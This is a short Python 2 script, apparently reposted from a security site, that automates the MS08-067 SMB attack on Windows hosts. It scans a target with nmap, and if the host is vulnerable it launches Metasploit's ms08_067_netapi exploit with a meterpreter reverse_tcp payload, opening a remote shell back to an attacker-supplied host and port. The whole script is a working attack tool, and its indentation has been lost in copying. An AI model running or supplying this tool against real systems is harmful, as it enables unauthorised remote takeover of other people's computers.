THN - SMB checker and exploiter ‘MS08-067’

1. #!/usr/bin/env python
2. #
3. # File_Name: SMB checker and exploiter 'MS08-067'
4. # Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
5. # Thanks: Dave Relik from #social-engineer --> freenode
6. # home: live.isecur1ty.org lnxg33k.wordpress.com
7. #
8.  
9. import os
10. import sys
11. import subprocess
12. import re
13.  
14. if os.getuid() != 0:
15. print 'requires root privileges.'
16. sys.exit(1)
17.  
18. def usage():
19. if len(sys.argv) != 4:
20. print 'Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]'
21. print 'EX) ./smb.py 192.168.1.50 192.168.1.6 443'
22. sys.exit(1)
23. usage()
24.  
25. print """
26. ************************************************
27. **\tSMB checker and exploiter 'MS08-067' \t**
28. **\tWritten by: Ahmed Shawky aka lnxg33k \t**
29. **\tThanks: Dave Relik @ #social-engineer\t**
30. ************************************************
31. """
32.  
33. RHOST = sys.argv[1]
34. LHOST = sys.argv[2]
35. LPORT = sys.argv[3]
36.  
37. nmap = subprocess.Popen('nmap -sS -p445 --script smb-check-vulns.nse %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()
38.  
39. f = open('/tmp/nmap.txt', 'rU')
40. reader = f.read()
41. found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader) #| MS08-067: VULNERABLE
42. if not found:
43. print '\nSystem is not vulnerable'
44. sys.exit(1)
45.  
46. print '\nLooks like it\'s a vulnerable host'
47. print 'I will exploit it for you\n'
48.  
49.  
50. metasploit = subprocess.Popen('msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=%s LHOST=%s LPORT=%s E' %(RHOST,LHOST,LPORT), shell=True).wait()
51.  
52. print '[**] Nice PWN'
53. subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()